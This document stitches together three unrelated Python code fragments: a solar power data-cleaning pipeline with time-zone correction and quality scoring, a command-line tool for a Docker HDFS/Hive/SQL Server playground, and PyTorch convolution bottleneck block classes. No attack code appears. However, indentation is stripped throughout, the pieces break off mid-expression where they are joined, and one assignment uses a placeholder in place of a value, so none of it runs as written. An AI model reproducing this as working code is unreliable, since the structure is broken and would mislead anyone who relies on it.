self.num_days = self.raw_data_matrix.shape[1]
if self.raw_data_matrix.shape[0] <= 1400:
self.data_sampling = int(24 * 60 / self.raw_data_matrix.shape[0])
else:
self.data_sampling = 24 * 60 / self.raw_data_matrix.shape[0]
else:
self.num_days = None
self.data_sampling = None
self.filled_data_matrix = None
self.use_column = None
self.capacity_estimate = None
self.start_doy = None
self.day_index = None
self.power_units = None
# "Extra" data, i.e. additional columns to process from the table
self.extra_matrices = {} # Matrix views of extra columns
self.extra_quality_scores = {} # Relative quality: fraction of non-NaN values in column during daylight time periods, as defined by the main power columns
# Scores for the entire data set
self.data_quality_score = None # Fraction of days without data acquisition errors
self.data_clearness_score = None # Fraction of days that are approximately clear/sunny
# Flags for the entire data set
self.inverter_clipping = None # True if there is inverter clipping, false otherwise
self.num_clip_points = None # If clipping, the number of clipping set points
self.capacity_changes = None # True if the apparent capacity seems to change over the data set
self.normal_quality_scores = None # True if clustering of data quality scores are within decision boundaries
self.time_shifts = None # True if time shifts detected and corrected in data set
self.tz_correction = 0 # TZ correction factor (determined during pipeline run)
# Daily scores (floats), flags (booleans), and boolean masks
self.daily_scores = DailyScores() # 1D arrays of floats
self.daily_flags = DailyFlags() # 1D arrays of Booleans
self.boolean_masks = BooleanMasks() # 2D arrays of Booleans
# Useful daily signals defined by the data set
self.daily_signals = DailySignals()
# Algorithm objects
self.scsf = None
self.capacity_analysis = None
self.time_shift_analysis = None
self.daytime_analysis = None
# Private attributes
self._ran_pipeline = False
self._error_msg = ''
self.__density_lower_threshold = None
self.__density_upper_threshold = None
self.__linearity_threshold = None
self.__recursion_depth = 0
self.__initial_time = None
self.__fix_dst_ran = False
def run_pipeline(self, power_col=None, min_val=-5, max_val=None,
zero_night=True, interp_day=True, fix_shifts=True,
density_lower_threshold=0.6, density_upper_threshold=1.05,
linearity_threshold=0.1, clear_day_smoothness_param=0.9,
clear_day_energy_param=0.8, verbose=True,
start_day_ix=None, end_day_ix=None, c1=None, c2=500.,
solar_noon_estimator='com', correct_tz=True, extra_cols=None,
daytime_threshold=0.1, units='W'):
self.daily_scores = DailyScores()
self.daily_flags = DailyFlags()
self.capacity_analysis = None
self.time_shift_analysis = None
self.extra_matrices = {} # Matrix views of extra columns
self.extra_quality_scores = {}
self.power_units = units
if self.__recursion_depth == 0:
self.tz_correction = 0
t = np.zeros(6)
######################################################################
# Preprocessing
######################################################################
t[0] = time()
if self.data_frame_raw is not None:
self.data_frame = standardize_time_axis(self.data_frame_raw,
timeindex=True,
verbose=verbose)
if self.data_frame is not None:
self.make_data_matrix(power_col, start_day_ix=start_day_ix,
end_day_ix=end_day_ix)
if max_val is not None:
mat_copy = np.copy(self.raw_data_matrix)
mat_copy[np.isnan(mat_copy)] = -9999
slct = mat_copy > max_val
if np.sum(slct) > 0:
self.raw_data_matrix[slct] = np.nan
if min_val is not None:
mat_copy = np.copy(self.raw_data_matrix)
mat_copy[np.isnan(mat_copy)] = 9999
slct = mat_copy < min_val
if np.sum(slct) > 0:
self.raw_data_matrix[slct] = np.nan
self.capacity_estimate = np.nanquantile(self.raw_data_matrix, 0.95)
if self.capacity_estimate <= 500 and self.power_units == 'W':
self.power_units = 'kW'
self.boolean_masks.missing_values = np.isnan(self.raw_data_matrix)
ss = SunriseSunset()
ss.run_optimizer(self.raw_data_matrix, plot=False)
self.boolean_masks.daytime = ss.sunup_mask_estimated
self.daytime_analysis = ss
### TZ offset detection and correction ###
# (1) Determine if there exists a "large" timezone offset error
if power_col is None:
power_col = self.data_frame.columns[0]
if correct_tz:
average_day = np.zeros(self.raw_data_matrix.shape[0])
all_nans = np.alltrue(np.isnan(self.raw_data_matrix), axis=1)
average_day[~all_nans] = np.nanmean(
self.raw_data_matrix[~all_nans, :], axis=1
)
average_day -= np.min(average_day)
average_day /= np.max(average_day)
### Troubleshooting code
# plt.plot(average_day)
# plt.axhline(0.02, color='red', ls='--', linewidth=1)
# plt.show()
meas_per_hour = np.int(60 / self.data_sampling)
cond1 = np.any(average_day[:meas_per_hour] > 0.02)
cond2 = np.any(average_day[-meas_per_hour:] > 0.02)
cond3 = self.__recursion_depth <= 2
if (cond1 or cond2) and cond3:
if verbose:
print(
'Warning: power generation at midnight. Attempting to correct...')
# Catch values that are more than 4 hours from noon and make a
# correction to the time axis (rough correction to avoid days
# rolling over)
rough_noon_est = np.nanmean(
self.data_frame.groupby(pd.Grouper(freq='D')) \
.idxmax()[power_col].dt.time \
.apply(lambda x: 60 * x.hour + x.minute)
) / 60
self.tz_correction = 12 - np.round(rough_noon_est)
self.data_frame.index = self.data_frame.index.shift(
self.tz_correction, freq='H'
)
if verbose:
print('Done.\nRestarting the pipeline...')
self.__recursion_depth += 1
if self.__initial_time is not None:
self.__initial_time = t[0]
self.run_pipeline(
power_col=power_col, min_val=min_val,
max_val=max_val, zero_night=zero_night,
interp_day=interp_day, fix_shifts=fix_shifts,
density_lower_threshold=density_lower_threshold,
density_upper_threshold=density_upper_threshold,
linearity_threshold=linearity_threshold,
clear_day_smoothness_param=clear_day_smoothness_param,
clear_day_energy_param=clear_day_energy_param,
verbose=verbose, start_day_ix=start_day_ix,
end_day_ix=end_day_ix, c1=c1, c2=c2,
solar_noon_estimator=solar_noon_estimator,
correct_tz=correct_tz, extra_cols=extra_cols,
daytime_threshold=daytime_threshold, units=units
)
return
######################################################################
# Cleaning
######################################################################
t[1] = time()
self.make_filled_data_matrix(zero_night=zero_night, interp_day=interp_day)
num_raw_measurements = np.count_nonzero(
np.nan_to_num(self.raw_data_matrix,
copy=True,
nan=0.)[self.boolean_masks.daytime]
)
num_filled_measurements = np.count_nonzero(
np.nan_to_num(self.filled_data_matrix,
copy=True,
nan=0.)[self.boolean_masks.daytime]
)
if num_raw_measurements > 0:
ratio = num_filled_measurements / num_raw_measurements
else:
msg = 'Error: data set contains no non-zero values!'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.daily_scores = None
self.daily_flags = None
self.data_quality_score = 0.0
self.data_clearness_score = 0.0
self._ran_pipeline = True
return
if ratio < 0.9:
msg = 'Error: data was lost during NaN filling procedure. '
msg += 'This typically occurs when\nthe time stamps are in the '
msg += 'wrong timezone. Please double check your data table.\n'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.daily_scores = None
self.daily_flags = None
self.data_quality_score = None
self.data_clearness_score = None
self._ran_pipeline = True
return
### TZ offset detection and correction ###
# (2) Determine if there is a "small" timezone offset error
if correct_tz:
average_noon = np.nanmean(
avg_sunrise_sunset(self.filled_data_matrix, threshold=0.01)
)
tz_offset = int(np.round(12 - average_noon))
if tz_offset != 0:
self.tz_correction += tz_offset
# Related to this bug fix:
# https://github.com/slacgismo/solar-data-tools/commit/ae0037771c09ace08bff5a4904475da606e934da
old_index = self.data_frame.index.copy()
self.data_frame.index = self.data_frame.index.shift(
tz_offset, freq='H'
)
self.data_frame = self.data_frame.reindex(index=old_index,
method='nearest',
limit=1).fillna(0)
meas_per_hour = self.filled_data_matrix.shape[0] / 24
roll_by = int(meas_per_hour * tz_offset)
self.filled_data_matrix = np.nan_to_num(
np.roll(self.filled_data_matrix, roll_by, axis=0),
0
)
self.raw_data_matrix = np.roll(
self.raw_data_matrix, roll_by, axis=0
)
self.boolean_masks.daytime = np.roll(
self.boolean_masks.daytime, roll_by, axis=0
)
######################################################################
# Scoring
######################################################################
t[2] = time()
t_clean = np.zeros(6)
t_clean[0] = time()
try:
self.get_daily_scores(threshold=0.2)
except:
msg = 'Daily quality scoring failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.daily_scores = None
try:
self.get_daily_flags(density_lower_threshold=density_lower_threshold,
density_upper_threshold=density_upper_threshold,
linearity_threshold=linearity_threshold)
except:
msg = 'Daily quality flagging failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.daily_flags = None
t_clean[1] = time()
try:
self.detect_clear_days(smoothness_threshold=clear_day_smoothness_param,
energy_threshold=clear_day_energy_param)
except:
msg = 'Clear day detection failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
t_clean[2] = time()
try:
self.clipping_check()
except:
msg = 'Clipping check failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.inverter_clipping = None
t_clean[3] = time()
try:
self.score_data_set()
except:
msg = 'Data set summary scoring failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
self.data_quality_score = None
self.data_clearness_score = None
t_clean[4] = time()
try:
self.capacity_clustering()
except TypeError:
self.capacity_changes = None
t_clean[5] = time()
######################################################################
# Fix Time Shifts
######################################################################
t[3] = time()
if fix_shifts:
try:
self.auto_fix_time_shifts(c1=c1, c2=c2,
estimator=solar_noon_estimator,
threshold=daytime_threshold,
periodic_detector=False)
except Exception as e:
msg = 'Fix time shift algorithm failed.'
self._error_msg += '\n' + msg
if verbose:
print(msg)
print('Error message:', e)
print('\n')
self.time_shifts = None
######################################################################
# Update daytime detection based on cleaned up data
######################################################################
# self.daytime_analysis.run_optimizer(self.filled_data_matrix, plot=False)
self.daytime_analysis.calculate_times(self.filled_data_matrix)
self.boolean_masks.daytime = self.daytime_analysis.sunup_mask_estimated
######################################################################
# Process Extra columns
######################################################################
t[4] = time()
if extra_cols is not None:
freq = int(self.data_sampling * 60)
new_index = | |
config.volumes_dir
os.environ['sql_test_password'] = <PASSWORD>
def configure(args):
"""
Returns config using a file, arguments, or interactive input.
"""
_f = args.config_file
config = None
if get_config_file_needed(args):
if not os.path.exists(_f):
_o = input_with_validator('Config file "%s" does not exist. Would you like to create one' \
' interactively? (y/n): ' % _f, 'Please input "y" or "n".', validate_yn)
if _o.lower() == 'y':
config = configure_interactively()
config.save(_f)
print('Config saved.')
else:
print('Program needs configuration. Exiting.')
sys.exit(1)
return
else:
config = Config.load(_f)
print('Config read.')
if args.project_name:
config.project_name = args.project_name
if args.source_dir:
config.source_dir = args.source_dir
if args.data_dir:
config.data_dir = args.data_dir
if args.volumes_dir:
config.volumes_dir = args.volumes_dir
else:
config = Config(args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
return config
def configure_interactively():
"""
Creates a config from interactive input.
"""
proj_name = input_with_validator( \
'Please input your project name: ', \
'No spaces or non-alphanumeric characters allowed.', \
validate_project_name \
)
src_dir = input_with_validator( \
'Please input your playground src directory: ', \
'Please use a valid directory name that exists.', \
validate_directory \
)
data_dir = input_with_validator( \
'Please input your data directory: ', \
'Please use a valid directory name that exists.', \
validate_directory \
)
vol_dir = input_with_validator( \
'Please input your volumes directory: ', \
'Please use a valid parent directory name that exists.', \
validate_parent_directory \
)
config = Config(proj_name, src_dir, data_dir, vol_dir)
return config
def build_img_cmd(config, args):
"""
Command line function. See build_img() for documentation.
"""
build_img(config)
def format_hdfs_cmd(config, args):
"""
Command line function. See format_hdfs() for documentation.
"""
format_hdfs(config)
def ingest_data_cmd(config, args):
"""
Command line function. See ingest_data() for documentation.
"""
ingest_data(config)
def copy_source_cmd(config, args):
"""
Command line function. See copy_source() for documentation.
"""
copy_source(config)
def setup_hive_cmd(config, args):
"""
Command line function. See setup_hive() for documentation.
"""
setup_hive(config)
def cluster_up_cmd(config, args):
"""
Command line function. See cluster_up() for documentation.
"""
cluster_up(config)
def start_hadoop_daemons_cmd(config, args):
"""
Command line function. See start_hadoop_daemons() for documentation.
"""
start_hadoop_daemons(config)
def start_hive_server_cmd(config, args):
"""
Command line function. See start_hive_server() for documentation.
"""
start_hive_server(config)
def cluster_down_cmd(config, args):
"""
Command line function. See cluster_down() for documentation.
"""
cluster_down(config)
def setup_cmd(config, args):
"""
Command line function. See setup() for documentation.
"""
if args.skip_confirm:
setup(config)
return
result = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
' files? y/n: ' % (config.volumes_dir), \
'Please use "y" or "n".', \
validate_yn \
).lower()
if result == 'y':
setup(config)
else:
print('Cancelling.')
def start_cmd(config, args):
"""
Command line function. See start() for documentation.
"""
start(config, wait=not args.no_wait)
def stop_cmd(config, args):
"""
Command line function. See stop() for documentation.
"""
stop(config)
def destroy_volumes_cmd(config, args):
"""
Command line function. See destroy_volumes() for documentation.
"""
if args.skip_confirm:
destroy_volumes(config)
return
result = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
' files? y/n: ' % (config.volumes_dir), \
'Please use "y" or "n".', \
validate_yn \
).lower()
if result == 'y':
destroy_volumes(config)
else:
print('Cancelling.')
def print_hadoop_node_logs_cmd(config, args):
"""
Command line function. See print_hadoop_node_logs() for documentation.
"""
print_hadoop_node_logs(config, args.node)
def beeline_cli_cmd(config, args):
"""
Command line function. See beeline_cli() for documentation.
"""
beeline_cli(config)
def bash_cli_cmd(config, args):
"""
Command line function. See bash_cli() for documentation.
"""
bash_cli(config, args.node)
def sqlcmd_cli_cmd(config, args):
"""
Command line function. See sqlcmd_cli() for documentation.
"""
sqlcmd_cli(config, args.local)
def sql_exec_query_cmd(config, args):
"""
Command line function. See sql_exec_query() for documentation.
"""
sql_exec_query(config, args.query, args.database)
def sql_exec_file_cmd(config, args):
"""
Command line function. See sql_exec_file() for documentation.
"""
sql_exec_file(config, args.filename)
def sqoop_export_cmd(config, args):
"""
Command line function. See sqoop_export() for documentation.
"""
sqoop_export(config, args.export_dir, args.sql_table, args.database_name, args.delimiter)
def local_sql_info_cmd(config, args):
"""
Command line function. Prints out non-secured sql server connection info.
"""
print('SERVER NAME: tcp:localhost,%d' % (PORT_SQL_SQL))
print('AUTHENTICATION: SQL Server AUthentication')
print('LOGIN: sa')
print('PASSWORD: %s' % (SQL_TEST_PASSWORD))
def launch_ssms_win_local_cmd(config, args):
"""
Command line function. See launch_ssms_win_local() for documentation.
"""
launch_ssms_win_local(args.executable_path)
def exec_hive_file_cmd(config, args):
"""
Command line function. See exec_hive_file() for documentation.
"""
exec_hive_file(config, args.src_path)
def exec_hive_query_cmd(config, args):
"""
Command line function. See exec_hive_query() for documentation.
"""
exec_hive_query(config, args.query)
def print_health_cmd(config, args):
"""
Command line function. See print_health() for documentation.
"""
print_health(config)
def wait_for_healthy_nodes_cmd(config, args):
"""
Command line function. See wait_for_healthy_nodes_print() for documentation.
"""
wait_for_healthy_nodes_print(config, args.timeout)
def get_config_file_needed(args):
"""
Determines whether or not we need to fetch additional config variables from a file.
"""
return not (args.project_name and args.source_dir and args.data_dir and args.volumes_dir)
def main():
"""
Main entry point for the program
"""
parser = argparse.ArgumentParser(prog='playground', description='HDFS, Hive, and SQL Playground')
parser.set_defaults(func=None)
# config-file
parser.add_argument('--config-file', '-c', default='config.json', help='The filename' \
' of the configuration file.')
# config-overrides
config_group = parser.add_argument_group('config-overrides', description='Overrides' \
' the configuration variables.')
config_group.add_argument('--project-name', '-p')
config_group.add_argument('--source-dir', '-s')
config_group.add_argument('--data-dir', '-d')
config_group.add_argument('--volumes-dir', '-v')
config_group.set_defaults(project_name=None, source_dir=None, data_dir=None, volumes_dir=None)
subparsers = parser.add_subparsers()
# build-img
subparsers.add_parser('build-img', help='Builds or rebuilds the required Docker images. Do this' \
' when you change the Dockerfile or anything in ./bin/.').set_defaults(func=build_img_cmd)
# format-hdfs
subparsers.add_parser('format-hdfs', help='Formats the entire distributed file system of the' \
' running cluster.').set_defaults(func=format_hdfs_cmd)
# ingest-data
subparsers.add_parser('ingest-data', help='Copies the mounted data volume to HDFS at /data on' \
' the running cluster.').set_defaults(func=ingest_data_cmd)
# copy-source
subparsers.add_parser('copy-source', help='Copies the configured source folder to the mounted' \
' client node volume.').set_defaults(func=copy_source_cmd)
# setup-hive
subparsers.add_parser('setup-hive', help='Creates the Hive schema metastore and makes' \
' necessary directories in HDFS. Cluster should be up and hadoop daemons should already' \
' be running.').set_defaults(func=setup_hive_cmd)
# cluster-up
subparsers.add_parser('cluster-up', help='Boots up all the nodes on the cluster but does not' \
' start any of their services.').set_defaults(func=cluster_up_cmd)
# start-hadoop
subparsers.add_parser('start-hadoop', help='Starts the name node and data node services for' \
' HDFS on a running cluster.').set_defaults(func=start_hadoop_daemons_cmd)
# start-hive
subparsers.add_parser('start-hive', help='Starts the hive server in the running cluster.') \
.set_defaults(func=start_hive_server_cmd)
# cluster-down
subparsers.add_parser('cluster-down', help='Shuts down all of the nodes.') \
.set_defaults(func=cluster_down_cmd)
# setup
setup_p = subparsers.add_parser('setup', help='Sets up the cluster for the first time.')
setup_p.add_argument('--skip-confirm', '-y', action='store_true', help='Skips any confirmation' \
' messages')
setup_p.set_defaults(func=setup_cmd, skip_confirm=False)
# start
start_p = subparsers.add_parser('start', help='Spins up the cluster and starts the daemons on ' \
'each node.')
start_p.add_argument('--no-wait', '-w', action='store_true', help='Exits immediately after ' \
'the cluster daemons have been told to start rather than blocking until the nodes are healthy.')
start_p.set_defaults(func=start_cmd, no_wait=False)
# stop
subparsers.add_parser('stop', help='Stops all of the services and shuts down all of the nodes.') \
.set_defaults(func=stop_cmd)
# destroy-vol
destroy_vol_p = subparsers.add_parser('destroy-vol', help='Removes all persisted cluster files.')
destroy_vol_p.add_argument('--skip-confirm', '-y', action='store_true')
destroy_vol_p.set_defaults(func=destroy_volumes_cmd, skip_confirm=False)
# print-hadoop-logs
print_hadoop_node_logs_p = subparsers.add_parser('print-hadoop-logs', help='Prints the log file' \
' of the specified hadoop node.')
print_hadoop_node_logs_p.add_argument('--node', '-n', help='The node to check the logs for.')
print_hadoop_node_logs_p.set_defaults(func=print_hadoop_node_logs_cmd)
# beeline-cli
subparsers.add_parser('beeline-cli', help='Launches a cli using beeline on the client node.') \
.set_defaults(func=beeline_cli_cmd)
# bash-cli
bash_cli_p = subparsers.add_parser('bash-cli', help='Launches bash cli on a single node in the' \
' cluster.')
bash_cli_p.add_argument('--node', '-n', help='The Docker service name of the node. Refer to the' \
' docker-compose.yml. Examples: "client", "nn1", "dn1", etc.')
bash_cli_p.set_defaults(func=bash_cli_cmd, node='client')
# sql-cli
sql_cli_p = subparsers.add_parser('sql-cli', help='Launches sqlcmd on the client' \
' node or locally.')
sql_cli_p.add_argument('--local', '-l', action='store_true', help='If specified, sqlcmd is' \
' launched on the host machine instead of the client node. Note: this requires sqlcmd to' \
' be on the environment PATH variable.')
sql_cli_p.set_defaults(func=sqlcmd_cli_cmd, local=False)
# sql-exec-query
sql_exec_query_p = subparsers.add_parser('sql-exec-query', help='Executes an SQL query.')
sql_exec_query_p.add_argument('--query', '-q', help='The sql query.')
sql_exec_query_p.add_argument('--database', '-d', help='The database to use.')
sql_exec_query_p.set_defaults(func=sql_exec_query_cmd, database='master')
# sql-exec-file
sql_exec_file_p = subparsers.add_parser('sql-exec-file', help='Executes an SQL file on the ' \
'client node.')
sql_exec_file_p.add_argument('--filename', '-f', help='The relative filename in the source dir.')
sql_exec_file_p.set_defaults(func=sql_exec_file_cmd)
# sqoop-export
sqoop_export_p = subparsers.add_parser('sqoop-export', help='Exports CSV files loaded in HDFS' \
' to the sql server node.')
#args.export_dir, args.sql_table, args.database_name, args.delimiter
sqoop_export_p.add_argument('--export-dir', '-e', help='The directory in HDFS which contains' \
' the CSV files.')
sqoop_export_p.add_argument('--sql-table', '-t', help='The name of the sql table to export to.' \
' Note: this table should already exist with the correct schema.')
sqoop_export_p.add_argument('--database-name', '-b', help='The name of the database to' \
' export to.')
sqoop_export_p.add_argument('--delimiter', '-d', help='The character used to for delimiting' \
' the values in the HDFS files.')
sqoop_export_p.set_defaults(func=sqoop_export_cmd, database_name='master', delimiter=',')
# local-sql-info
subparsers.add_parser('local-sql-info', help='Shows the connection information for connecting' \
' to the sql server from the parent host.').set_defaults(func=local_sql_info_cmd)
# launch-ssms
launch_ssms_p = subparsers.add_parser('launch-ssms', help='Note: | |
<reponame>BayesWatch/pytorch-moonshine
# blocks and convolution definitions
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
try:
from pytorch_acdc.layers import FastStackedConvACDC
except ImportError:
# then we assume you don't want to use this layer
pass
def ACDC(in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=False):
return FastStackedConvACDC(in_channels, out_channels, kernel_size, 12,
stride=stride, padding=padding, dilation=dilation, groups=groups,
bias=bias)
class Conv(nn.Module):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(Conv, self).__init__()
# Dumb normal conv incorporated into a class
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size,
stride=stride, padding=padding, bias=bias)
def forward(self, x):
return self.conv(x)
class ConvBottleneck(nn.Module):
def __init__(self, in_planes, out_planes, bottleneck, stride=1, kernel_size=3, padding=1, bias=False):
super(ConvBottleneck, self).__init__()
self.conv1x1_down = nn.Conv2d(in_planes, bottleneck, kernel_size=1, stride=1, padding=0, bias=bias)
self.bn1 = nn.BatchNorm2d(bottleneck)
self.conv = nn.Conv2d(bottleneck, bottleneck, kernel_size=kernel_size, stride=stride, padding=padding,
bias=bias)
self.bn2= nn.BatchNorm2d(bottleneck)
self.conv1x1_up = nn.Conv2d(bottleneck, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)
def forward(self, x):
out = F.relu(self.bn1(self.conv1x1_down(x)))
out = F.relu(self.bn2(self.conv(out)))
out = self.conv1x1_up(out)
return out
class GConvBottleneck(nn.Module):
def __init__(self, in_planes, out_planes, bottleneck, group_split, stride=1, kernel_size=3, padding=1, bias=False):
super(GConvBottleneck, self).__init__()
self.conv1x1_down = nn.Conv2d(in_planes, bottleneck, kernel_size=1, stride=1, padding=0, bias=bias)
self.bn1 = nn.BatchNorm2d(bottleneck)
self.conv = nn.Conv2d(bottleneck, bottleneck, kernel_size=kernel_size, stride=stride, padding=padding,
bias=bias, groups=bottleneck//group_split)
self.bn2= nn.BatchNorm2d(bottleneck)
self.conv1x1_up = nn.Conv2d(bottleneck, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)
def forward(self, x):
out = F.relu(self.bn1(self.conv1x1_down(x)))
out = F.relu(self.bn2(self.conv(out)))
out = self.conv1x1_up(out)
return out
class AConvBottleneck(nn.Module):
def __init__(self, in_planes, out_planes, bottleneck, groups, stride=1, kernel_size=3, padding=1, bias=False):
super(AConvBottleneck, self).__init__()
self.conv1x1_down = nn.Conv2d(in_planes, bottleneck, kernel_size=1, stride=1, padding=0, bias=bias)
self.bn1 = nn.BatchNorm2d(bottleneck)
self.conv = nn.Conv2d(bottleneck, bottleneck, kernel_size=kernel_size, stride=stride, padding=padding,
bias=bias, groups=groups)
self.bn2= nn.BatchNorm2d(bottleneck)
self.conv1x1_up = nn.Conv2d(bottleneck, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)
def forward(self, x):
out = F.relu(self.bn1(self.conv1x1_down(x)))
out = F.relu(self.bn2(self.conv(out)))
out = self.conv1x1_up(out)
return out
class G2B2(GConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(G2B2, self).__init__(in_planes, out_planes, bottleneck = out_planes // 2,group_split = 2,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class G4B2(GConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(G4B2, self).__init__(in_planes, out_planes, bottleneck = out_planes // 2,group_split = 4,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class G8B2(GConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(G8B2, self).__init__(in_planes, out_planes, bottleneck = out_planes // 2,group_split = 8,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class G16B2(GConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(G16B2, self).__init__(in_planes, out_planes, bottleneck = out_planes // 2,group_split = 16,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class A2B2(AConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(A2B2, self).__init__(in_planes, out_planes, bottleneck = out_planes // 2,groups = 2,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class A4B2(AConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(A4B2, self).__init__(in_planes, out_planes, bottleneck = out_planes // 2,groups = 4,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class A8B2(AConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(A8B2, self).__init__(in_planes, out_planes, bottleneck = out_planes // 2,groups= 8,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class A16B2(AConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(A16B2, self).__init__(in_planes, out_planes, bottleneck = out_planes // 2,groups = 16,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class G2B4(GConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(G2B4, self).__init__(in_planes, out_planes, bottleneck = out_planes // 4,group_split = 2,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class G4B4(GConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(G4B4, self).__init__(in_planes, out_planes, bottleneck = out_planes // 4,group_split = 4,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class G8B4(GConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(G8B4, self).__init__(in_planes, out_planes, bottleneck = out_planes // 4,group_split = 8,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class G16B4(GConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(G16B4, self).__init__(in_planes, out_planes, bottleneck = out_planes // 4,group_split = 16,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class ConvB2(ConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(ConvB2, self).__init__(in_planes, out_planes, out_planes//2,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class ConvB4(ConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(ConvB4, self).__init__(in_planes, out_planes, out_planes//4,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class ConvB8(ConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(ConvB8, self).__init__(in_planes, out_planes, out_planes//8,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class ConvB16(ConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(ConvB16, self).__init__(in_planes, out_planes, out_planes//16,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class Conv2x2(nn.Module):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=2, padding=1, bias=False):
super(Conv2x2, self).__init__()
# Dilated 2x2 convs
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=2,
stride=stride, padding=padding, bias=bias, dilation=2)
def forward(self, x):
return self.conv(x)
class DConv(nn.Module):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False, groups=None):
super(DConv, self).__init__()
# This class replaces BasicConv, as such it assumes the output goes through a BN+ RELU whereas the
# internal BN + RELU is written explicitly
self.convdw = nn.Conv2d(in_planes, in_planes, kernel_size=kernel_size, stride=stride, padding=padding,
bias=bias, groups=in_planes if groups is None else groups)
self.bn = nn.BatchNorm2d(in_planes)
self.conv1x1 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)
def forward(self, x):
return self.conv1x1(F.relu(self.bn(self.convdw(x))))
class DConvG2(DConv):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvG2, self).__init__(in_planes, out_planes,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias, groups=in_planes//2)
class DConvG4(DConv):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvG4, self).__init__(in_planes, out_planes,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias, groups=in_planes//4)
class DConvG8(DConv):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvG8, self).__init__(in_planes, out_planes,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias, groups=in_planes//8)
class DConvG16(DConv):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvG16, self).__init__(in_planes, out_planes,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias, groups=in_planes//16)
class DConvA2(DConv):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvA2, self).__init__(in_planes, out_planes,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias, groups=2)
class DConvA4(DConv):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvA4, self).__init__(in_planes, out_planes,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias, groups=4)
class DConvA8(DConv):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvA8, self).__init__(in_planes, out_planes,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias, groups=8)
class DConvA16(DConv):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvA16, self).__init__(in_planes, out_planes,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias, groups=16)
class DConvBottleneck(nn.Module):
def __init__(self, in_planes, out_planes, bottleneck, stride=1, kernel_size=3, padding=1, bias=False):
